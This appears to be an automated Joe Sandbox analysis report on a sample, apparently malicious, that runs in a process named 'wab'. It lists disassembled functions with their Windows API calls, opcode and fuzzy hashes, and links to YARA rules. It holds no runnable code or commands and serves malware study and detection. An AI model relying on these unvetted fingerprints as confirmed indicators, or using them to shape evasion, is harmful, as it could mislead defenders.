                                                                                                                                                                                                                    • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040B1AB Relevance: 3.0, APIs: 2, Instructions: 14COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                                                    • Opcode ID: 4a6bf56a3c8e18f25b9487746213253c86c510b1b99403974ad2cc9a69351a87
                                                                                                                                                                                                                    • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a6bf56a3c8e18f25b9487746213253c86c510b1b99403974ad2cc9a69351a87
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040B0B5 Relevance: 3.0, APIs: 2, Instructions: 7COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                                                    • Opcode ID: 536c2047bffc8dd9b34700d623eb618271f55ea3451f57cc7c37cab4f8277461
                                                                                                                                                                                                                    • Instruction ID: 93a37c1a4f050773dc1a5674df64ec50811fc8a39a1cc3e4a9db11821b00e242
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 536c2047bffc8dd9b34700d623eb618271f55ea3451f57cc7c37cab4f8277461
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0B012310281004DEB057BA1B8061142302C64332E3B3413FE000500A3DE5D6034140F
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcmpmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1065087418-0
                                                                                                                                                                                                                    • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                                                    • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00406C5A Relevance: 2.7, APIs: 2, Instructions: 184COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00406E09
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00406E5A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$??2@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3700833809-0
                                                                                                                                                                                                                    • Opcode ID: fbf9b295b5a7520f84bfa942b8c4279f7b3464a00728e86ce032f040724bd2e9
                                                                                                                                                                                                                    • Instruction ID: 3357a4f00022c45c5c3ded2ab4a10c96e173cb442a6a42c74f6c45d37007c03c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fbf9b295b5a7520f84bfa942b8c4279f7b3464a00728e86ce032f040724bd2e9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE7117B1E00219EBCB04DFA9D8949EEB7B5FF08304F11802EF916A7281D7789951CB64
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00418C63 Relevance: 2.6, APIs: 2, Instructions: 132COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2221118986-0
                                                                                                                                                                                                                    • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                                                                                                    • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004300E8 Relevance: 2.6, APIs: 2, Instructions: 103COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1297977491-0
                                                                                                                                                                                                                    • Opcode ID: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                                                                                                                                                    • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                                      • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                                      • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                                      • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                                    • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1481295809-0
                                                                                                                                                                                                                    • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                                                    • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3150196962-0
                                                                                                                                                                                                                    • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                                                                                                    • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$PointerRead
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3154509469-0
                                                                                                                                                                                                                    • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                                    • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                                                                      • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                                                                      • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                                                                      • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4232544981-0
                                                                                                                                                                                                                    • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                                    • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                                                    • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                                    • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                                                    • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$FileModuleName
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3859505661-0
                                                                                                                                                                                                                    • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                                    • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                                                                                    • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                                    • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                                                                                    • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                                    • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                                                    • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                                                    • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040B633 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                                                    • Opcode ID: 708d35572adfbd8c0afef1fefac48864b5998db401338d2add0cc9d49b5fd8aa
                                                                                                                                                                                                                    • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 708d35572adfbd8c0afef1fefac48864b5998db401338d2add0cc9d49b5fd8aa
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                                    • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                                    • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                                    • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                                    • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040AA04 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                    Download Yara Rule
